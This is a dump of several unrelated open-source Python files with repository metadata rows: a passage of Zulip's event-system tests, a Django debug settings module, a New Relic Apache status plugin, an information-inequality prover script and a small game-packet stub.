(False, 0), (False, 1234), (False, 0), (True, 1234), (False, 0),
(True, 1234), (True, 600), (False, 600), (False, 1234), (True, 600)):
events = self.do_test(lambda: do_set_realm_message_editing(self.user_profile.realm,
allow_message_editing, message_content_edit_limit_seconds))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_is_admin(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_user')),
('op', equals('update')),
('person', check_dict([
('email', check_string),
('is_admin', check_bool),
])),
])
# The first False is probably a noop, then we get transitions in both directions.
for is_admin in [False, True, False]:
events = self.do_test(lambda: do_change_is_admin(self.user_profile, is_admin))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_twenty_four_hour_time(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_display_settings')),
('setting_name', equals('twenty_four_hour_time')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_twenty_four_hour_time(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_left_side_userlist(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_display_settings')),
('setting_name', equals('left_side_userlist')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_left_side_userlist(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_realm_emoji_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_emoji')),
('op', equals('update')),
('realm_emoji', check_dict([])),
])
events = self.do_test(lambda: check_add_realm_emoji(get_realm_by_string_id("zulip"), "my_emoji",
"https://realm.com/my_emoji"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
events = self.do_test(lambda: do_remove_realm_emoji(get_realm_by_string_id("zulip"), "my_emoji"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_realm_filter_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_filters')),
('realm_filters', check_list(None)), # TODO: validate tuples in the list
])
events = self.do_test(lambda: do_add_realm_filter(get_realm_by_string_id("zulip"), "#(?P<id>[123])",
"https://realm.com/my_realm_filter/%(id)s"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
self.do_test(lambda: do_remove_realm_filter(get_realm_by_string_id("zulip"), "#(?P<id>[123])"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_create_bot(self):
# type: () -> None
bot_created_checker = check_dict([
('type', equals('realm_bot')),
('op', equals('add')),
('bot', check_dict([
('email', check_string),
('user_id', check_int),
('full_name', check_string),
('api_key', check_string),
('default_sending_stream', check_none_or(check_string)),
('default_events_register_stream', check_none_or(check_string)),
('default_all_public_streams', check_bool),
('avatar_url', check_string),
])),
])
action = lambda: self.create_bot('test-bot@zulip.com')
events = self.do_test(action)
error = bot_created_checker('events[1]', events[1])
self.assert_on_error(error)
def test_change_bot_full_name(self):
# type: () -> None
action = lambda: do_change_full_name(self.bot, 'New Bot Name')
events = self.do_test(action)
error = self.realm_bot_schema('full_name', check_string)('events[1]', events[1])
self.assert_on_error(error)
def test_regenerate_bot_api_key(self):
# type: () -> None
action = lambda: do_regenerate_api_key(self.bot)
events = self.do_test(action)
error = self.realm_bot_schema('api_key', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_avatar_source(self):
# type: () -> None
action = lambda: do_change_avatar_source(self.bot, self.bot.AVATAR_FROM_USER)
events = self.do_test(action)
error = self.realm_bot_schema('avatar_url', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_default_all_public_streams(self):
# type: () -> None
action = lambda: do_change_default_all_public_streams(self.bot, True)
events = self.do_test(action)
error = self.realm_bot_schema('default_all_public_streams', check_bool)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_default_sending_stream(self):
# type: () -> None
stream = get_stream("Rome", self.bot.realm)
action = lambda: do_change_default_sending_stream(self.bot, stream)
events = self.do_test(action)
error = self.realm_bot_schema('default_sending_stream', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_default_events_register_stream(self):
# type: () -> None
stream = get_stream("Rome", self.bot.realm)
action = lambda: do_change_default_events_register_stream(self.bot, stream)
events = self.do_test(action)
error = self.realm_bot_schema('default_events_register_stream', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_do_deactivate_user(self):
# type: () -> None
bot_deactivate_checker = check_dict([
('type', equals('realm_bot')),
('op', equals('remove')),
('bot', check_dict([
('email', check_string),
('full_name', check_string),
])),
])
bot = self.create_bot('foo-bot@zulip.com')
action = lambda: do_deactivate_user(bot)
events = self.do_test(action)
error = bot_deactivate_checker('events[1]', events[1])
self.assert_on_error(error)
def test_rename_stream(self):
# type: () -> None
realm = get_realm_by_string_id('zulip')
stream = self.make_stream('old_name')
new_name = u'stream with a brand new name'
self.subscribe_to_stream(self.user_profile.email, stream.name)
action = lambda: do_rename_stream(realm, stream.name, new_name)
events = self.do_test(action)
schema_checker = check_dict([
('type', equals('stream')),
('op', equals('update')),
('property', equals('email_address')),
('value', check_string),
('name', equals('old_name')),
])
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
schema_checker = check_dict([
('type', equals('stream')),
('op', equals('update')),
('property', equals('name')),
('value', equals(new_name)),
('name', equals('old_name')),
])
error = schema_checker('events[1]', events[1])
self.assert_on_error(error)
def test_deactivate_stream_neversubscribed(self):
# type: () -> None
stream = self.make_stream('old_name')
action = lambda: do_deactivate_stream(stream)
events = self.do_test(action)
schema_checker = check_dict([
('type', equals('stream')),
('op', equals('delete')),
('streams', check_list(check_dict([]))),
])
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_subscribe_other_user_never_subscribed(self):
# type: () -> None
action = lambda: self.subscribe_to_stream("othello@zulip.com", u"test_stream")
events = self.do_test(action)
schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('peer_add')),
('user_id', check_int),
('subscriptions', check_list(check_string)),
])
error = schema_checker('events[2]', events[2])
self.assert_on_error(error)
def test_subscribe_events(self):
# type: () -> None
subscription_schema_checker = check_list(
check_dict([
('color', check_string),
('description', check_string),
('email_address', check_string),
('invite_only', check_bool),
('in_home_view', check_bool),
('name', check_string),
('desktop_notifications', check_bool),
('audible_notifications', check_bool),
('stream_id', check_int),
('subscribers', check_list(check_int)),
])
)
add_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('add')),
('subscriptions', subscription_schema_checker),
])
remove_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('remove')),
('subscriptions', check_list(
check_dict([
('name', equals('test_stream')),
('stream_id', check_int),
]),
)),
])
peer_add_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('peer_add')),
('user_id', check_int),
('subscriptions', check_list(check_string)),
])
peer_remove_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('peer_remove')),
('user_id', check_int),
('subscriptions', check_list(check_string)),
])
stream_update_schema_checker = check_dict([
('type', equals('stream')),
('op', equals('update')),
('property', equals('description')),
('value', check_string),
('name', check_string),
])
action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream") # type: Callable
events = self.do_test(action, event_types=["subscription", "realm_user"])
error = add_schema_checker('events[0]', events[0])
self.assert_on_error(error)
action = lambda: self.subscribe_to_stream("othello@zulip.com", "test_stream")
events = self.do_test(action)
error = peer_add_schema_checker('events[0]', events[0])
self.assert_on_error(error)
stream = get_stream("test_stream", self.user_profile.realm)
action = lambda: bulk_remove_subscriptions(
[get_user_profile_by_email("othello@zulip.com")],
[stream])
events = self.do_test(action)
error = peer_remove_schema_checker('events[0]', events[0])
self.assert_on_error(error)
action = lambda: bulk_remove_subscriptions(
[get_user_profile_by_email("hamlet@zulip.com")],
[stream])
events = self.do_test(action)
error = remove_schema_checker('events[1]', events[1])
self.assert_on_error(error)
action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream")
events = self.do_test(action)
error = add_schema_checker('events[1]', events[1])
self.assert_on_error(error)
action = lambda: do_change_stream_description(get_realm_by_string_id('zulip'), 'test_stream', u'new description')
events = self.do_test(action)
error = stream_update_schema_checker('events[0]', events[0])
self.assert_on_error(error)
class FetchInitialStateDataTest(ZulipTestCase):
# Non-admin users don't have access to all bots
def test_realm_bots_non_admin(self):
# type: () -> None
email = 'cordelia@zulip.com'
user_profile = get_user_profile_by_email(email)
self.assertFalse(user_profile.is_realm_admin)
result = fetch_initial_state_data(user_profile, None, "")
self.assert_length(result['realm_bots'], 0)
# additionally the API key for a random bot is not present in the data
api_key = get_user_profile_by_email('notification-bot@zulip.com').api_key
self.assertNotIn(api_key, str(result))
# Admin users have access to all bots in the realm_bots field
def test_realm_bots_admin(self):
# type: () -> None
email = 'hamlet@zulip.com'
user_profile = get_user_profile_by_email(email)
do_change_is_admin(user_profile, True)
self.assertTrue(user_profile.is_realm_admin)
result = fetch_initial_state_data(user_profile, None, "")
self.assertTrue(len(result['realm_bots']) > 5)
class EventQueueTest(TestCase):
def test_one_event(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "pointer",
"pointer": 1,
"timestamp": "1"})
self.assertFalse(queue.empty())
self.assertEqual(queue.contents(),
[{'id': 0,
'type': 'pointer',
"pointer": 1,
"timestamp": "1"}])
def test_event_collapsing(self):
# type: () -> None
queue = EventQueue("1")
for pointer_val in range(1, 10):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
self.assertEqual(queue.contents(),
[{'id': 8,
'type': 'pointer',
"pointer": 9,
"timestamp": "9"}])
queue = EventQueue("2")
for pointer_val in range(1, 10):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
queue.push({"type": "unknown"})
queue.push({"type": "restart", "server_generation": "1"})
for pointer_val in range(11, 20):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
queue.push({"type": "restart", "server_generation": "2"})
self.assertEqual(queue.contents(),
[{"type": "unknown",
"id": 9,},
{'id': 19,
'type': 'pointer',
"pointer": 19,
"timestamp": "19"},
{"id": 20,
"type": "restart",
"server_generation": "2"}])
for pointer_val in range(21, 23):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
self.assertEqual(queue.contents(),
[{"type": "unknown",
"id": 9,},
{'id': 19,
'type': 'pointer',
"pointer": 19,
"timestamp": "19"},
{"id": 20,
"type": "restart",
"server_generation": "2"},
{'id': 22,
'type': 'pointer',
"pointer": 22,
"timestamp": "22"},
])
def test_flag_add_collapsing(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "update_message_flags",
"flag": "read",
"operation": "add",
"all": False,
"messages": [1, 2, 3, 4],
"timestamp": "1"})
queue.push({"type": "update_message_flags",
"flag": "read",
"all": False,
"operation": "add",
"messages": [5, 6],
"timestamp": "1"})
self.assertEqual(queue.contents(),
[{'id': 1,
'type': 'update_message_flags',
"all": False,
"flag": "read",
"operation": "add",
"messages": [1, 2, 3, 4, 5, 6],
"timestamp": "1"}])
def test_flag_remove_collapsing(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "update_message_flags",
"flag": "collapsed",
"operation": "remove",
"all": False,
"messages": [1, 2, 3, 4],
"timestamp": "1"})
queue.push({"type": "update_message_flags",
"flag": "collapsed",
"all": False,
"operation": "remove",
"messages": [5, 6],
"timestamp": "1"})
self.assertEqual(queue.contents(),
[{'id': 1,
'type': 'update_message_flags',
"all": False,
"flag": "collapsed",
"operation": "remove",
"messages": [1, 2, 3, 4, 5, 6],
"timestamp": "1"}])
def test_collapse_event(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "pointer",
"pointer": 1,
"timestamp": "1"})
queue.push({"type": "unknown",
"timestamp": "1"})
self.assertEqual(queue.contents(),
[{'id': 0,
'type': 'pointer',
"pointer": 1,
"timestamp": "1"},
{'id': 1,
'type': 'unknown',
"timestamp": "1"}])
class TestEventsRegisterAllPublicStreamsDefaults(TestCase):
def setUp(self):
# type: () -> None
self.email = 'hamlet@zulip.com'
self.user_profile = get_user_profile_by_email(self.email)
def test_use_passed_all_public_true_default_false(self):
# type: () -> None
self.user_profile.default_all_public_streams = False
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, True)
self.assertTrue(result)
def test_use_passed_all_public_true_default(self):
# type: () -> None
self.user_profile.default_all_public_streams = True
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, True)
self.assertTrue(result)
def test_use_passed_all_public_false_default_false(self):
# type: () -> None
self.user_profile.default_all_public_streams = False
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, False)
self.assertFalse(result)
def test_use_passed_all_public_false_default_true(self):
# type: () -> None
self.user_profile.default_all_public_streams = True
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, False)
self.assertFalse(result)
def test_use_true_default_for_none(self):
# type: () -> None
self.user_profile.default_all_public_streams = True
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, None)
self.assertTrue(result)
def test_use_false_default_for_none(self):
# type: () -> None
self.user_profile.default_all_public_streams = False
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, None)
self.assertFalse(result)
class TestEventsRegisterNarrowDefaults(TestCase):
def setUp(self):
# type: () -> None
self.email = 'hamlet@zulip.com'
self.user_profile = get_user_profile_by_email(self.email)
self.stream = get_stream('Verona', self.user_profile.realm)
def test_use_passed_narrow_no_default(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = None
self.user_profile.save()
result = _default_narrow(self.user_profile, [[u'stream', u'my_stream']])
self.assertEqual(result, [[u'stream', u'my_stream']])
def test_use_passed_narrow_with_default(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = self.stream.id
self.user_profile.save()
result = _default_narrow(self.user_profile, [[u'stream', u'my_stream']])
self.assertEqual(result, [[u'stream', u'my_stream']])
def test_use_default_if_narrow_is_empty(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = self.stream.id
self.user_profile.save()
result = _default_narrow(self.user_profile, [])
self.assertEqual(result, [[u'stream', u'Verona']])
def test_use_narrow_if_default_is_none(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = None
self.user_profile.save()
result = _default_narrow(self.user_profile, [])
self.assertEqual(result, [])
| calvinleenyc/zulip | zerver/tests/test_events.py | Python | apache-2.0 | 49,189 |
"""
Base debug settings for a project to include via execfile().
"""
from cinch import cinch_settings
g = globals()
S = g.setdefault
# Debugging and development modes
S('DEBUG', True)
S('TEMPLATE_DEBUG', g['DEBUG'])
S('TEMPLATE_STRING_IF_INVALID', 'INVALID_CONTEXT[%s]')
# Include our sibling base settings
g.update(cinch_settings(g, 'base'))
# Directory structure
S('MEDIA_ROOT', g['TMP_DIR'].child('media'))
# Django - request pipeline
g['MIDDLEWARE_CLASSES'].append('debug_toolbar.middleware.DebugToolbarMiddleware')
# Django - installed apps
g['INSTALLED_APPS'].append(
# django-debug-toolbar: A configurable set of panels that display
# various debug information about the current request/response.
# https://github.com/django-debug-toolbar/django-debug-toolbar
'debug_toolbar'
)
| hipikat/django-cinch | cinch/settings/debug.py | Python | bsd-2-clause | 810 |
"""
ApacheHTTPD Support
"""
import logging
import re
from newrelic_plugin_agent.plugins import base
LOGGER = logging.getLogger(__name__)
PATTERN = re.compile(r'^([\w\s{1}]+):\s([\d\.{1}]+)', re.M)
class ApacheHTTPD(base.HTTPStatsPlugin):
DEFAULT_QUERY = 'auto'
GUID = 'com.meetme.newrelic_apache_httpd_agent'
KEYS = {'Total Accesses': {'type': '',
'label': 'Totals/Requests',
'suffix': 'requests'},
'BusyWorkers': {'type': 'gauge',
'label': 'Workers/Busy',
'suffix': 'workers'},
'Total kBytes': {'type': '',
'label': 'Totals/Bytes Sent',
'suffix': 'kb'},
'BytesPerSec': {'type': 'gauge',
'label': 'Bytes/Per Second',
'suffix': 'bytes/sec'},
'BytesPerReq': {'type': 'gauge',
'label': 'Requests/Average Payload Size',
'suffix': 'bytes'},
'IdleWorkers': {'type': 'gauge', 'label': 'Workers/Idle',
'suffix': 'workers'},
'CPULoad': {'type': 'gauge', 'label': 'CPU Load',
'suffix': 'processes'},
'ReqPerSec': {'type': 'gauge', 'label': 'Requests/Velocity',
'suffix': 'requests/sec'},
'Uptime': {'type': 'gauge', 'label': 'Uptime', 'suffix': 'sec'},
'ConnsTotal': {'type': 'gauge', 'label': 'Connections/Total', 'suffix': 'conns'},
'ConnsAsyncWriting': {'type': 'gauge', 'label': 'Connections/AsyncWriting', 'suffix': 'conns'},
'ConnsAsyncKeepAlive': {'type': 'gauge', 'label': 'Connections/AsyncKeepAlive', 'suffix': 'conns'},
'ConnsAsyncClosing': {'type': 'gauge', 'label': 'Connections/AsyncClosing', 'suffix': 'conns'},
'_': {'type': 'gauge', 'label': 'Scoreboard/Waiting For Conn', 'suffix': 'slots'},
'S': {'type': 'gauge', 'label': 'Scoreboard/Starting Up', 'suffix': 'slots'},
'R': {'type': 'gauge', 'label': 'Scoreboard/Reading Request', 'suffix': 'slots'},
'W': {'type': 'gauge', 'label': 'Scoreboard/Sending Reply', 'suffix': 'slots'},
'K': {'type': 'gauge', 'label': 'Scoreboard/Keepalive Read', 'suffix': 'slots'},
'D': {'type': 'gauge', 'label': 'Scoreboard/DNS Lookup', 'suffix': 'slots'},
'C': {'type': 'gauge', 'label': 'Scoreboard/Closing Conn', 'suffix': 'slots'},
'L': {'type': 'gauge', 'label': 'Scoreboard/Logging', 'suffix': 'slots'},
'G': {'type': 'gauge', 'label': 'Scoreboard/Gracefully Finishing', 'suffix': 'slots'},
'I': {'type': 'gauge', 'label': 'Scoreboard/Idle Cleanup', 'suffix': 'slots'},
'.': {'type': 'gauge', 'label': 'Scoreboard/Open Slot', 'suffix': 'slots'}}
def error_message(self):
LOGGER.error('Could not match any of the stats, please make ensure '
'Apache HTTPd is configured correctly. If you report '
'this as a bug, please include the full output of the '
'status page from %s in your ticket', self.stats_url)
def get_scoreboard(self, data):
"""Fetch the scoreboard from the stats URL
:rtype: str
"""
keys = ['_', 'S', 'R', 'W', 'K', 'D', 'C', 'L', 'G', 'I', '.']
values = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
score_out = dict(zip(keys, values))
for line in data.splitlines():
if line.find('Scoreboard') != -1:
scoreboard = line.replace('Scoreboard: ','')
for i in range(0, len(scoreboard)):
score_out[scoreboard[i]] += 1
return score_out
def add_datapoints(self, stats):
"""Add all of the data points for a node
:param str stats: The stats content from Apache as a string
"""
matches = PATTERN.findall(stats or '')
for key, value in matches:
try:
value = int(value)
except ValueError:
try:
value = float(value)
except ValueError:
value = 0
if key in self.KEYS:
if self.KEYS[key].get('type') == 'gauge':
self.add_gauge_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
self.add_derive_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
LOGGER.debug('Found unmapped key/value pair: %s = %s',
key, value)
score_data = self.get_scoreboard(stats)
for key, value in score_data.iteritems():
if key in self.KEYS:
if self.KEYS[key].get('type') == 'gauge':
self.add_gauge_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
self.add_derive_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
LOGGER.debug('Found unmapped key/value pair: %s = %s',
key, value)
| notnmeyer/newrelic-plugin-agent | newrelic_plugin_agent/plugins/apache_httpd.py | Python | bsd-3-clause | 5,670 |
"""
Python Information Theoretic Inequality Prover
Usage:
pitip VARNAMES CHECK [-p]
Options:
-p, --prove Show proof
"""
import numpy as np
from .core.app import application
from .core.io import System, column_varname_labels
from .core.it import elemental_inequalities, elemental_forms
def _format_dual_coef(system, index, coef):
expr = system.row_names[index]
if np.isclose(coef, 1):
return expr
if np.isclose(coef, round(coef)):
coef = int(round(coef))
return "{} * {}".format(expr, coef)
def format_dual_vector(system, vec):
formatted = (
_format_dual_coef(system, index, coef)
for index, coef in enumerate(vec)
if not np.isclose(coef, 0))
by_quant_len = lambda s: (-len(s.split()[0]), s)
return " " + "\n+ ".join(sorted(formatted, key=by_quant_len))
def get_term_counts(system, vec):
d = {}
for coef, cat in zip(vec, system.row_categ):
if np.isclose(coef, round(coef)):
coef = int(round(coef))
if coef != 0:
d.setdefault(cat, 0)
d[cat] += coef
return [d[i] for i in sorted(d, reverse=True)]
def indent(lines, amount, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
@application
def main(app):
opts = app.opts
varnames = opts['VARNAMES']
num_vars = len(varnames)
system = System(np.array(list(elemental_inequalities(num_vars))),
column_varname_labels(varnames))
check = System.load(opts['CHECK'])
system, _ = system.slice(check.columns, fill=True)
system.row_names = [f.fmt(varnames) for f in elemental_forms(num_vars)]
system.row_categ = [len(n)/2-1 + (n[0]=='H')
for n in system.row_names]
lp = system.lp()
for ineq in check.matrix:
valid = lp.implies(ineq, embed=True)
print(valid)
if valid:
print(indent(format_dual_vector(system, lp.get_dual_solution()), 4))
print(get_term_counts(system, lp.get_dual_solution()))
| coldfix/pystif | pystif/pitip.py | Python | gpl-3.0 | 2,067 |
from util.tipo import tipo
class S_PLAYER_CHANGE_EP(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
| jeff-alves/Tera | game/message/unused/S_PLAYER_CHANGE_EP.py | Python | mit | 230 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.